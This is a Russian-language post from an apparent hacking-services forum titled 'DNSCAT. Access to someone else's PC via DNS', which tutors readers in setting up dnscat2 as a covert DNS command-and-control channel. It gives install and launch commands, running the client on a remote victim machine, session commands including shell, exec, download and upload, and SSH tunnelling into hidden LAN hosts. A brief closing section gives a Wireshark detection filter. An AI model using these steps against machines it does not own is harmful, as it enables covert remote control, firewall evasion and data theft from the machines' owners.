Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

DNSCAT. Доступ к чужому ПК через DNS

roguevad
 Share

Recommended Posts

roguevad Newbie

roguevad

Posted
Posted

Приветствую, хакеры!
Сегодня я бы хотел вам рассказать об утилите dnscat2

dnscat2 - это утилита для создания C&C канала, используя DNS. Включает в себя серверную часть, которая написана на Ruby и клиент, написанный на С.

C&C (Command and Control) сервер - компьютер, контролируемый атакующим, который отправляет команды на скомпрометированную машину.

В чем смысл маскировки трафика под DNS​

 

Часто бывает, что проходу нормального трафика мешает firewall, а резолв имен почти всегда разрешен.

 

Накидал для вас примерную схему:

7ce7051d-e17b-43ac-b430-6f8652e24450.png

 

Скачивание и установка

sudo apt-get updаte

sudo аpt-get -y instаll ruby-dev git mаke g++

sudo gem install bundler

git clone https://github.com/iagox86/dnscat2.git

 

Установка серверной части:

cd dnscat2/server

bundle instаll

 

Установка клиентской части:

cd dnscat2/client

make

 

Если возникли ошибки при установке:
iagox86/dnscat2 найдите вашу ошибку здесь.
Тут описаны некоторые ошибки. Если вашей ошибки нет, тозагуглите.

 

К делу​

Запускаем:

Сервер: sudo ruby dnscat2.rb

Клиент: запускаете на удаленной машине.

*Если разрешен доступ только к легитимным DNS серверам:

Сервер:

sudo ruby dnscat2.rb legitdnsserver.com

 

Клиент:

./build legitdnsserver.com

  • Как только произойдет подключение dnscat2 выведет вам номер сессии.
  • После выбора сессии:

sessions -i

  • У вас будет доступен ряд команд:

clear

delay

download

echo

exec

help

listen

ping

quit

set

shell

shutdown

suspend

tunnels

unset

upload

window

windows

 

Проброс туннеля

Если вам нужен удобный доступ к машинам в локальной сети по SSH, то это очень полезная вещь.

  • Выбираем сессию и вводим команду:

listen :

  • Теперь вы можете спокойно подключиться к той машине, которую не видно из вне через ssh.

ssh -P username@127.0.0.1

Кстати, dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что не гарантирует 100% криптографическую стойкость, но защита есть.

 

Как обнаружить dnscat2 на своей машине​

  • Делаем дамп через wireshark и забиваем следующий фильтр:

dns.qry.name.len > 16 and !mdns

16 - просто длина имени DNS домена. Я подбирал вручную, у вас это число может отличаться. Чтобы его подобрать просто смотрите в результат фильтрации. После этого фильтра могут остаться и нормальные DNS запросы, просто ищите dnscat.

  • И в информации о пакете ищем dnscat.

507c72c1-057f-4cc2-84a0-244474d7ec9f.png

 

Полезные ссылки

 

 

Link to comment
Share on other sites
  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
 Share
Go to topic listing


  • Member Statistics

    6,192
    Total Members
    30,834
    Most Online
    vdkelena
    Newest Member
    vdkelena
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.

  I accept